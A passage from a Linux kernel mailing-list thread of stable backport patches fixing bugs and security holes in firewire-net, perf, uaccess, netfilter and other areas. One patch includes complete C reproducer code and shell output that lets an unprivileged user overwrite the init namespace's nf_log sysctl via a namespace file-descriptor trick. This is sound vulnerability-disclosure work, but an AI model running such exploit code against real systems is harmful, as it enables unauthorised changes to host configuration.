drivers/gpu/drm/radeon/atombios_crtc.c | 2 ++
drivers/gpu/drm/radeon/radeon_legacy_crtc.c | 2 ++
2 files changed, 4 insertions(+)

diff --git a/drivers/gpu/drm/radeon/atombios_crtc.c b/drivers/gpu/drm/radeon/atombios_crtc.c
index 8ac3330..4d09582 100644
--- a/drivers/gpu/drm/radeon/atombios_crtc.c
+++ b/drivers/gpu/drm/radeon/atombios_crtc.c
@@ -257,6 +257,8 @@ void atombios_crtc_dpms(struct drm_crtc *crtc, int mode)
atombios_enable_crtc_memreq(crtc, ATOM_ENABLE);
atombios_blank_crtc(crtc, ATOM_DISABLE);
drm_vblank_post_modeset(dev, radeon_crtc->crtc_id);
+ /* Make sure vblank interrupt is still enabled if needed */
+ radeon_irq_set(rdev);
radeon_crtc_load_lut(crtc);
break;
case DRM_MODE_DPMS_STANDBY:
diff --git a/drivers/gpu/drm/radeon/radeon_legacy_crtc.c b/drivers/gpu/drm/radeon/radeon_legacy_crtc.c
index bc73021..ae0d7b1 100644
--- a/drivers/gpu/drm/radeon/radeon_legacy_crtc.c
+++ b/drivers/gpu/drm/radeon/radeon_legacy_crtc.c
@@ -331,6 +331,8 @@ static void radeon_crtc_dpms(struct drm_crtc *crtc, int mode)
WREG32_P(RADEON_CRTC_EXT_CNTL, crtc_ext_cntl, ~(mask | crtc_ext_cntl));
}
drm_vblank_post_modeset(dev, radeon_crtc->crtc_id);
+ /* Make sure vblank interrupt is still enabled if needed */
+ radeon_irq_set(rdev);
radeon_crtc_load_lut(crtc);
break;
case DRM_MODE_DPMS_STANDBY:
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:12 PM2/5/17
to
From: Stefan Richter <ste...@s5r6.in-berlin.de>

commit 667121ace9dbafb368618dbabcf07901c962ddac upstream.

The IP-over-1394 driver firewire-net lacked input validation when
handling incoming fragmented datagrams. A maliciously formed fragment
with a respectively large datagram_offset would cause a memcpy past the
datagram buffer.

So, drop any packets carrying a fragment with offset + length larger
than datagram_size.

In addition, ensure that
- GASP header, unfragmented encapsulation header, or fragment
encapsulation header actually exists before we access it,
- the encapsulated datagram or fragment is of nonzero size.

Reported-by: Eyal Itkin <eyal....@gmail.com>
Reviewed-by: Eyal Itkin <eyal....@gmail.com>
Fixes: CVE 2016-8633
Signed-off-by: Stefan Richter <ste...@s5r6.in-berlin.de>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/firewire/net.c | 51 ++++++++++++++++++++++++++++++++++----------------
1 file changed, 35 insertions(+), 16 deletions(-)

diff --git a/drivers/firewire/net.c b/drivers/firewire/net.c
index 7bdb6fe6..70a716e 100644
--- a/drivers/firewire/net.c
+++ b/drivers/firewire/net.c
@@ -591,6 +591,9 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len,
int retval;
u16 ether_type;

+ if (len <= RFC2374_UNFRAG_HDR_SIZE)
+ return 0;
+
hdr.w0 = be32_to_cpu(buf[0]);
lf = fwnet_get_hdr_lf(&hdr);
if (lf == RFC2374_HDR_UNFRAG) {
@@ -615,7 +618,12 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len,
return fwnet_finish_incoming_packet(net, skb, source_node_id,
is_broadcast, ether_type);
}
+
/* A datagram fragment has been received, now the fun begins. */
+
+ if (len <= RFC2374_FRAG_HDR_SIZE)
+ return 0;
+
hdr.w1 = ntohl(buf[1]);
buf += 2;
len -= RFC2374_FRAG_HDR_SIZE;
@@ -629,6 +637,9 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len,
datagram_label = fwnet_get_hdr_dgl(&hdr);
dg_size = fwnet_get_hdr_dg_size(&hdr); /* ??? + 1 */

+ if (fg_off + len > dg_size)
+ return 0;
+
spin_lock_irqsave(&dev->lock, flags);

peer = fwnet_peer_find_by_node_id(dev, source_node_id, generation);
@@ -735,6 +746,22 @@ static void fwnet_receive_packet(struct fw_card *card, struct fw_request *r,
fw_send_response(card, r, rcode);
}

+static int gasp_source_id(__be32 *p)
+{
+ return be32_to_cpu(p[0]) >> 16;
+}
+
+static u32 gasp_specifier_id(__be32 *p)
+{
+ return (be32_to_cpu(p[0]) & 0xffff) << 8 |
+ (be32_to_cpu(p[1]) & 0xff000000) >> 24;
+}
+
+static u32 gasp_version(__be32 *p)
+{
+ return be32_to_cpu(p[1]) & 0xffffff;
+}
+
static void fwnet_receive_broadcast(struct fw_iso_context *context,
u32 cycle, size_t header_length, void *header, void *data)
{
@@ -744,9 +771,6 @@ static void fwnet_receive_broadcast(struct fw_iso_context *context,
__be32 *buf_ptr;
int retval;
u32 length;
- u16 source_node_id;
- u32 specifier_id;
- u32 ver;
unsigned long offset;
unsigned long flags;

@@ -763,22 +787,17 @@ static void fwnet_receive_broadcast(struct fw_iso_context *context,

spin_unlock_irqrestore(&dev->lock, flags);

- specifier_id = (be32_to_cpu(buf_ptr[0]) & 0xffff) << 8
- | (be32_to_cpu(buf_ptr[1]) & 0xff000000) >> 24;
- ver = be32_to_cpu(buf_ptr[1]) & 0xffffff;
- source_node_id = be32_to_cpu(buf_ptr[0]) >> 16;
-
- if (specifier_id == IANA_SPECIFIER_ID &&
- (ver == RFC2734_SW_VERSION
+ if (length > IEEE1394_GASP_HDR_SIZE &&
+ gasp_specifier_id(buf_ptr) == IANA_SPECIFIER_ID &&
+ (gasp_version(buf_ptr) == RFC2734_SW_VERSION
#if IS_ENABLED(CONFIG_IPV6)
- || ver == RFC3146_SW_VERSION
+ || gasp_version(buf_ptr) == RFC3146_SW_VERSION
#endif
- )) {
- buf_ptr += 2;
- length -= IEEE1394_GASP_HDR_SIZE;
- fwnet_incoming_packet(dev, buf_ptr, length, source_node_id,
+ ))
+ fwnet_incoming_packet(dev, buf_ptr + 2,
+ length - IEEE1394_GASP_HDR_SIZE,
+ gasp_source_id(buf_ptr),
context->card->generation, true);
- }

packet.payload_length = dev->rcv_buffer_size;
packet.interrupt = 1;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:12 PM2/5/17
to
From: Dmitry Torokhov <dmitry....@gmail.com>

commit 47af45d684b5f3ae000ad448db02ce4f13f73273 upstream.

The commit 4097461897df ("Input: i8042 - break load dependency ...")
correctly set up ps2_cmd_mutex pointer for the KBD port but forgot to do
the same for AUX port(s), which results in communication on KBD and AUX
ports to clash with each other.

Fixes: 4097461897df ("Input: i8042 - break load dependency ...")
Reported-by: Bruno Wolff III <br...@wolff.to>
Tested-by: Bruno Wolff III <br...@wolff.to>
Signed-off-by: Dmitry Torokhov <dmitry....@gmail.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/input/serio/i8042.c | 1 +
1 file changed, 1 insertion(+)

diff --git a/drivers/input/serio/i8042.c b/drivers/input/serio/i8042.c
index 2513c8a..2d8f959 100644
--- a/drivers/input/serio/i8042.c
+++ b/drivers/input/serio/i8042.c
@@ -1249,6 +1249,7 @@ static int __init i8042_create_aux_port(int idx)
serio->write = i8042_aux_write;
serio->start = i8042_start;
serio->stop = i8042_stop;
+ serio->ps2_cmd_mutex = &i8042_mutex;
serio->port_data = port;
serio->dev.parent = &i8042_platform_device->dev;
if (idx < 0) {
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:13 PM2/5/17
to
From: Christian König <christia...@amd.com>

commit 13f479b9df4e2bbf2d16e7e1b02f3f55f70e2455 upstream.

This bug seems to be present for a very long time.

Signed-off-by: Christian König <christia...@amd.com>
Reviewed-by: Alex Deucher <alexande...@amd.com>
Signed-off-by: Alex Deucher <alexande...@amd.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/gpu/drm/radeon/radeon_ttm.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/gpu/drm/radeon/radeon_ttm.c b/drivers/gpu/drm/radeon/radeon_ttm.c
index f701559..6c92c20 100644
--- a/drivers/gpu/drm/radeon/radeon_ttm.c
+++ b/drivers/gpu/drm/radeon/radeon_ttm.c
@@ -228,8 +228,8 @@ static int radeon_move_blit(struct ttm_buffer_object *bo,

rdev = radeon_get_rdev(bo->bdev);
ridx = radeon_copy_ring_index(rdev);
- old_start = old_mem->start << PAGE_SHIFT;
- new_start = new_mem->start << PAGE_SHIFT;
+ old_start = (u64)old_mem->start << PAGE_SHIFT;
+ new_start = (u64)new_mem->start << PAGE_SHIFT;

switch (old_mem->mem_type) {
case TTM_PL_VRAM:
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:13 PM2/5/17
to
From: Peter Zijlstra <pet...@infradead.org>

commit c3c87e770458aa004bd7ed3f29945ff436fd6511 upstream.

The fix from 9fc81d87420d ("perf: Fix events installation during
moving group") was incomplete in that it failed to recognise that
creating a group with events for different CPUs is semantically
broken -- they cannot be co-scheduled.

Furthermore, it leads to real breakage where, when we create an event
for CPU Y and then migrate it to form a group on CPU X, the code gets
confused where the counter is programmed -- triggered in practice
as well by me via the perf fuzzer.

Fix this by tightening the rules for creating groups. Only allow
grouping of counters that can be co-scheduled in the same context.
This means for the same task and/or the same cpu.

Fixes: 9fc81d87420d ("perf: Fix events installation during moving group")
Signed-off-by: Peter Zijlstra (Intel) <pet...@infradead.org>
Cc: Arnaldo Carvalho de Melo <ac...@kernel.org>
Cc: Jiri Olsa <jo...@redhat.com>
Cc: Linus Torvalds <torv...@linux-foundation.org>
Link: http://lkml.kernel.org/r/201501231258...@infradead.org
Signed-off-by: Ingo Molnar <mi...@kernel.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
include/linux/perf_event.h | 6 ------
kernel/events/core.c | 15 +++++++++++++--
2 files changed, 13 insertions(+), 8 deletions(-)

diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h
index 229a757..3204422 100644
--- a/include/linux/perf_event.h
+++ b/include/linux/perf_event.h
@@ -430,11 +430,6 @@ struct perf_event {
#endif /* CONFIG_PERF_EVENTS */
};

-enum perf_event_context_type {
- task_context,
- cpu_context,
-};
-
/**
* struct perf_event_context - event context structure
*
@@ -442,7 +437,6 @@ enum perf_event_context_type {
*/
struct perf_event_context {
struct pmu *pmu;
- enum perf_event_context_type type;
/*
* Protect the states of the events in the list,
* nr_active, and the list:
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 0f52078..76e26b8 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -6249,7 +6249,6 @@ skip_type:
__perf_event_init_context(&cpuctx->ctx);
lockdep_set_class(&cpuctx->ctx.mutex, &cpuctx_mutex);
lockdep_set_class(&cpuctx->ctx.lock, &cpuctx_lock);
- cpuctx->ctx.type = cpu_context;
cpuctx->ctx.pmu = pmu;
cpuctx->jiffies_interval = 1;
INIT_LIST_HEAD(&cpuctx->rotation_list);
@@ -6856,7 +6855,19 @@ SYSCALL_DEFINE5(perf_event_open,
* task or CPU context:
*/
if (move_group) {
- if (group_leader->ctx->type != ctx->type)
+ /*
+ * Make sure we're both on the same task, or both
+ * per-cpu events.
+ */
+ if (group_leader->ctx->task != ctx->task)
+ goto err_context;
+
+ /*
+ * Make sure we're both events for the same CPU;
+ * grouping events for different CPUs is broken; since
+ * you can never concurrently schedule them anyhow.
+ */
+ if (group_leader->cpu != event->cpu)
goto err_context;
} else {
if (group_leader->ctx != ctx)
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:35:28 PM2/5/17
to
From: Linus Torvalds <torv...@linux-foundation.org>

Not upstream as it is not needed there.

So a patch something like this might be a safe way to fix the
potential infoleak in older kernels.

THIS IS UNTESTED. It's a very obvious patch, though, so if it compiles
it probably works. It just initializes the output variable with 0 in
the inline asm description, instead of doing it in the exception
handler.

It will generate slightly worse code (a few unnecessary ALU
operations), but it doesn't have any interactions with the exception
handler implementation.

Signed-off-by: Jiri Slaby <jsl...@suse.cz>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
arch/x86/include/asm/uaccess.h | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/arch/x86/include/asm/uaccess.h b/arch/x86/include/asm/uaccess.h
index 5ee2687..995c49a 100644
--- a/arch/x86/include/asm/uaccess.h
+++ b/arch/x86/include/asm/uaccess.h
@@ -381,7 +381,7 @@ do { \
asm volatile("1: mov"itype" %1,%"rtype"0\n" \
"2:\n" \
_ASM_EXTABLE_EX(1b, 2b) \
- : ltype(x) : "m" (__m(addr)))
+ : ltype(x) : "m" (__m(addr)), "0" (0))

#define __put_user_nocheck(x, ptr, size) \
({ \
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:35:34 PM2/5/17
to
From: Petr Vandrovec <pe...@vandrovec.name>

commit 2ce9d2272b98743b911196c49e7af5841381c206 upstream.

Some code (all error handling) submits CDBs that are allocated
on the stack. This breaks with CB/CBI code that tries to create
URB directly from SCSI command buffer - which happens to be in
vmalloced memory with vmalloced kernel stacks.

Let's make copy of the command in usb_stor_CB_transport.

Signed-off-by: Petr Vandrovec <pe...@vandrovec.name>
Acked-by: Alan Stern <st...@rowland.harvard.edu>
Signed-off-by: Greg Kroah-Hartman <gre...@linuxfoundation.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/usb/storage/transport.c | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/drivers/usb/storage/transport.c b/drivers/usb/storage/transport.c
index b1d815e..8988b26 100644
--- a/drivers/usb/storage/transport.c
+++ b/drivers/usb/storage/transport.c
@@ -919,10 +919,15 @@ int usb_stor_CB_transport(struct scsi_cmnd *srb, struct us_data *us)

/* COMMAND STAGE */
/* let's send the command via the control pipe */
+ /*
+ * Command is sometime (f.e. after scsi_eh_prep_cmnd) on the stack.
+ * Stack may be vmallocated. So no DMA for us. Make a copy.
+ */
+ memcpy(us->iobuf, srb->cmnd, srb->cmd_len);
result = usb_stor_ctrl_transfer(us, us->send_ctrl_pipe,
US_CBI_ADSC,
USB_TYPE_CLASS | USB_RECIP_INTERFACE, 0,
- us->ifnum, srb->cmnd, srb->cmd_len);
+ us->ifnum, us->iobuf, srb->cmd_len);

/* check the return code for the command */
usb_stor_dbg(us, "Call to usb_stor_ctrl_transfer() returned %d\n",
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:36:00 PM2/5/17
to
From: Linus Walleij <linus....@linaro.org>

commit 7ac61a062f3147dc23e3f12b9dfe7c4dd35f9cb8 upstream.

Any readings from the raw interface of the KXSD9 driver will
return an empty string, because it does not return
IIO_VAL_INT but rather some random value from the accelerometer
to the caller.

Signed-off-by: Linus Walleij <linus....@linaro.org>
Signed-off-by: Jonathan Cameron <ji...@kernel.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/iio/accel/kxsd9.c | 1 +
1 file changed, 1 insertion(+)

diff --git a/drivers/iio/accel/kxsd9.c b/drivers/iio/accel/kxsd9.c
index a22c427..d94c0ca 100644
--- a/drivers/iio/accel/kxsd9.c
+++ b/drivers/iio/accel/kxsd9.c
@@ -160,6 +160,7 @@ static int kxsd9_read_raw(struct iio_dev *indio_dev,
if (ret < 0)
goto error_ret;
*val = ret;
+ ret = IIO_VAL_INT;
break;
case IIO_CHAN_INFO_SCALE:
ret = spi_w8r8(st->us, KXSD9_READ(KXSD9_REG_CTRL_C));
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:36:06 PM2/5/17
to
From: Max Staudt <mst...@suse.de>

commit d50b3f43db739f03fcf8c0a00664b3d2fed0496e upstream.

When using efifb with a 16-bit (5:6:5) visual, fbcon's text is rendered
in the wrong colors - e.g. text gray (#aaaaaa) is rendered as green
(#50bc50) and neighboring pixels have slightly different values
(such as #50bc78).

The reason is that fbcon loads its 16 color palette through
efifb_setcolreg(), which in turn calculates a 32-bit value to write
into memory for each palette index.
Until now, this code could only handle 8-bit visuals and didn't mask
overlapping values when ORing them.

With this patch, fbcon displays the correct colors when a qemu VM is
booted in 16-bit mode (in GRUB: "set gfxpayload=800x600x16").

Fixes: 7c83172b98e5 ("x86_64 EFI boot support: EFI frame buffer driver") # v2.6.24+
Signed-off-by: Max Staudt <mst...@suse.de>
Acked-By: Peter Jones <pjo...@redhat.com>
Signed-off-by: Tomi Valkeinen <tomi.va...@ti.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/video/efifb.c | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/drivers/video/efifb.c b/drivers/video/efifb.c
index 50fe668..08dbe8a 100644
--- a/drivers/video/efifb.c
+++ b/drivers/video/efifb.c
@@ -270,9 +270,9 @@ static int efifb_setcolreg(unsigned regno, unsigned red, unsigned green,
return 1;

if (regno < 16) {
- red >>= 8;
- green >>= 8;
- blue >>= 8;
+ red >>= 16 - info->var.red.length;
+ green >>= 16 - info->var.green.length;
+ blue >>= 16 - info->var.blue.length;
((u32 *)(info->pseudo_palette))[regno] =
(red << info->var.red.offset) |
(green << info->var.green.offset) |
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:36:53 PM2/5/17
to
From: Douglas Caetano dos Santos <doug...@taghos.com.br>

commit 2fe664f1fcf7c4da6891f95708a7a56d3c024354 upstream.

With TCP MTU probing enabled and offload TX checksumming disabled,
tcp_mtu_probe() calculated the wrong checksum when a fragment being copied
into the probe's SKB had an odd length. This was caused by the direct use
of skb_copy_and_csum_bits() to calculate the checksum, as it pads the
fragment being copied, if needed. When this fragment was not the last, a
subsequent call used the previous checksum without considering this
padding.

The effect was a stale connection in one way, as even retransmissions
wouldn't solve the problem, because the checksum was never recalculated for
the full SKB length.

Signed-off-by: Douglas Caetano dos Santos <doug...@taghos.com.br>
Signed-off-by: David S. Miller <da...@davemloft.net>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
net/ipv4/tcp_output.c | 12 +++++++-----
1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
index 465285b..1f2f6b5 100644
--- a/net/ipv4/tcp_output.c
+++ b/net/ipv4/tcp_output.c
@@ -1753,12 +1753,14 @@ static int tcp_mtu_probe(struct sock *sk)
len = 0;
tcp_for_write_queue_from_safe(skb, next, sk) {
copy = min_t(int, skb->len, probe_size - len);
- if (nskb->ip_summed)
+ if (nskb->ip_summed) {
skb_copy_bits(skb, 0, skb_put(nskb, copy), copy);
- else
- nskb->csum = skb_copy_and_csum_bits(skb, 0,
- skb_put(nskb, copy),
- copy, nskb->csum);
+ } else {
+ __wsum csum = skb_copy_and_csum_bits(skb, 0,
+ skb_put(nskb, copy),
+ copy, 0);
+ nskb->csum = csum_block_add(nskb->csum, csum, len);
+ }

if (skb->len <= copy) {
/* We've eaten all the data from this skb.
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:37:24 PM2/5/17
to
From: Michal Kubecek <mkub...@suse.cz>

commit be2cef49904b34dd5f75d96bbc8cd8341bab1bc0 upstream.

Some users observed that "least connection" distribution algorithm doesn't
handle well bursts of TCP connections from reconnecting clients after
a node or network failure.

This is because the algorithm counts active connection as worth 256
inactive ones where for TCP, "active" only means TCP connections in
ESTABLISHED state. In case of a connection burst, new connections are
handled before previous ones have finished the three way handshaking so
that all are still counted as "inactive", i.e. cheap ones. The become
"active" quickly but at that time, all of them are already assigned to one
real server (or few), resulting in highly unbalanced distribution.

Address this by counting the "pre-established" states as "active".

Signed-off-by: Michal Kubecek <mkub...@suse.cz>
Acked-by: Julian Anastasov <j...@ssi.bg>
Signed-off-by: Simon Horman <ho...@verge.net.au>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
net/netfilter/ipvs/ip_vs_proto_tcp.c | 25 +++++++++++++++++++++++--
1 file changed, 23 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/ipvs/ip_vs_proto_tcp.c b/net/netfilter/ipvs/ip_vs_proto_tcp.c
index 50a1594..3032ede 100644
--- a/net/netfilter/ipvs/ip_vs_proto_tcp.c
+++ b/net/netfilter/ipvs/ip_vs_proto_tcp.c
@@ -373,6 +373,20 @@ static const char *const tcp_state_name_table[IP_VS_TCP_S_LAST+1] = {
[IP_VS_TCP_S_LAST] = "BUG!",
};

+static const bool tcp_state_active_table[IP_VS_TCP_S_LAST] = {
+ [IP_VS_TCP_S_NONE] = false,
+ [IP_VS_TCP_S_ESTABLISHED] = true,
+ [IP_VS_TCP_S_SYN_SENT] = true,
+ [IP_VS_TCP_S_SYN_RECV] = true,
+ [IP_VS_TCP_S_FIN_WAIT] = false,
+ [IP_VS_TCP_S_TIME_WAIT] = false,
+ [IP_VS_TCP_S_CLOSE] = false,
+ [IP_VS_TCP_S_CLOSE_WAIT] = false,
+ [IP_VS_TCP_S_LAST_ACK] = false,
+ [IP_VS_TCP_S_LISTEN] = false,
+ [IP_VS_TCP_S_SYNACK] = true,
+};
+
#define sNO IP_VS_TCP_S_NONE
#define sES IP_VS_TCP_S_ESTABLISHED
#define sSS IP_VS_TCP_S_SYN_SENT
@@ -396,6 +410,13 @@ static const char * tcp_state_name(int state)
return tcp_state_name_table[state] ? tcp_state_name_table[state] : "?";
}

+static bool tcp_state_active(int state)
+{
+ if (state >= IP_VS_TCP_S_LAST)
+ return false;
+ return tcp_state_active_table[state];
+}
+
static struct tcp_states_t tcp_states [] = {
/* INPUT */
/* sNO, sES, sSS, sSR, sFW, sTW, sCL, sCW, sLA, sLI, sSA */
@@ -518,12 +539,12 @@ set_tcp_state(struct ip_vs_proto_data *pd, struct ip_vs_conn *cp,

if (dest) {
if (!(cp->flags & IP_VS_CONN_F_INACTIVE) &&
- (new_state != IP_VS_TCP_S_ESTABLISHED)) {
+ !tcp_state_active(new_state)) {
atomic_dec(&dest->activeconns);
atomic_inc(&dest->inactconns);
cp->flags |= IP_VS_CONN_F_INACTIVE;
} else if ((cp->flags & IP_VS_CONN_F_INACTIVE) &&
- (new_state == IP_VS_TCP_S_ESTABLISHED)) {
+ tcp_state_active(new_state)) {
atomic_inc(&dest->activeconns);
atomic_dec(&dest->inactconns);
cp->flags &= ~IP_VS_CONN_F_INACTIVE;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:37:31 PM2/5/17
to
From: Peter Ujfalusi <peter.u...@ti.com>

commit a8719670687c46ed2e904c0d05fa4cd7e4950cd1 upstream.

Fixes: ddd17531ad908 ("ASoC: omap-mcpdm: Clean up with devm_* function")

Managed irq request will not doing any good in ASoC probe level as it is
not going to free up the irq when the driver is unbound from the sound
card.

Signed-off-by: Peter Ujfalusi <peter.u...@ti.com>
Reported-by: Russell King <li...@armlinux.org.uk>
Signed-off-by: Mark Brown <bro...@kernel.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
sound/soc/omap/omap-mcpdm.c | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/sound/soc/omap/omap-mcpdm.c b/sound/soc/omap/omap-mcpdm.c
index eb05c7e..5dc6b23 100644
--- a/sound/soc/omap/omap-mcpdm.c
+++ b/sound/soc/omap/omap-mcpdm.c
@@ -393,8 +393,8 @@ static int omap_mcpdm_probe(struct snd_soc_dai *dai)
pm_runtime_get_sync(mcpdm->dev);
omap_mcpdm_write(mcpdm, MCPDM_REG_CTRL, 0x00);

- ret = devm_request_irq(mcpdm->dev, mcpdm->irq, omap_mcpdm_irq_handler,
- 0, "McPDM", (void *)mcpdm);
+ ret = request_irq(mcpdm->irq, omap_mcpdm_irq_handler, 0, "McPDM",
+ (void *)mcpdm);

pm_runtime_put_sync(mcpdm->dev);

@@ -414,6 +414,7 @@ static int omap_mcpdm_remove(struct snd_soc_dai *dai)
{
struct omap_mcpdm *mcpdm = snd_soc_dai_get_drvdata(dai);

+ free_irq(mcpdm->irq, (void *)mcpdm);
pm_runtime_disable(mcpdm->dev);

return 0;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Gavin Shan <gws...@linux.vnet.ibm.com>

commit b13460b92093b29347e99d6c3242e350052b62cd upstream.

The macro offsetofend() introduces unnecessary temporary variable
"tmp". The patch avoids that and saves a bit memory in stack.

Signed-off-by: Gavin Shan <gws...@linux.vnet.ibm.com>
Signed-off-by: Alex Williamson <alex.wi...@redhat.com>
[wt: backported only for ipv6 out-of-bounds fix]

Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
include/linux/vfio.h | 5 ++---
1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/include/linux/vfio.h b/include/linux/vfio.h
index ac8d488..1a7f0ac 100644
--- a/include/linux/vfio.h
+++ b/include/linux/vfio.h
@@ -86,8 +86,7 @@ extern void vfio_unregister_iommu_driver(
* from user space. This allows us to easily determine if the provided
* structure is sized to include various fields.
*/
-#define offsetofend(TYPE, MEMBER) ({ \
- TYPE tmp; \
- offsetof(TYPE, MEMBER) + sizeof(tmp.MEMBER); }) \
+#define offsetofend(TYPE, MEMBER) \
+ (offsetof(TYPE, MEMBER) + sizeof(((TYPE *)0)->MEMBER))

#endif /* VFIO_H */
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Jann Horn <ja...@thejh.net>

commit dbb5918cb333dfeb8897f8e8d542661d2ff5b9a0 upstream.

nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

char child_stack[1000000];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}

int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
NULL))
err(1, "mount");

/* Yes, we need to set the maps for the net sysctls to recognize us
* as namespace root.
*/
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);

stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}

int main(void) {
outer_uid = getuid();
outer_gid = getgid();

int child = clone(child_fn, child_stack + sizeof(child_stack),
CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
|CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");

char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn <ja...@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pa...@netfilter.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
net/netfilter/nf_log.c | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c
index 3b18dd1..07ed65a 100644
--- a/net/netfilter/nf_log.c
+++ b/net/netfilter/nf_log.c
@@ -253,7 +253,7 @@ static int nf_log_proc_dostring(ctl_table *table, int write,
size_t size = *lenp;
int r = 0;
int tindex = (unsigned long)table->extra1;
- struct net *net = current->nsproxy->net_ns;
+ struct net *net = table->extra2;

if (write) {
if (size > sizeof(buf))
@@ -306,7 +306,6 @@ static int netfilter_log_sysctl_init(struct net *net)
3, "%d", i);
nf_log_sysctl_table[i].procname =
nf_log_sysctl_fnames[i];
- nf_log_sysctl_table[i].data = NULL;
nf_log_sysctl_table[i].maxlen =
NFLOGGER_NAME_LEN * sizeof(char);
nf_log_sysctl_table[i].mode = 0644;
@@ -317,6 +316,9 @@ static int netfilter_log_sysctl_init(struct net *net)
}
}

+ for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++)
+ table[i].extra2 = net;
+
net->nf.nf_log_dir_header = register_net_sysctl(net,
"net/netfilter/nf_log",
table);
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:07 PM2/5/17
to
From: Richard Weinberger <ric...@nod.at>

commit d8e9e5e80e882b4f90cba7edf1e6cb7376e52e54 upstream.

Don't pass a size larger than iov_len to kernel_sendmsg().
Otherwise it will cause a NULL pointer deref when kernel_sendmsg()
returns with rv < size.

DRBD as external module has been around in the kernel 2.4 days already.
We used to be compatible to 2.4 and very early 2.6 kernels,
we used to use
rv = sock_sendmsg(sock, &msg, iov.iov_len);
then later changed to
rv = kernel_sendmsg(sock, &msg, &iov, 1, size);
when we should have used
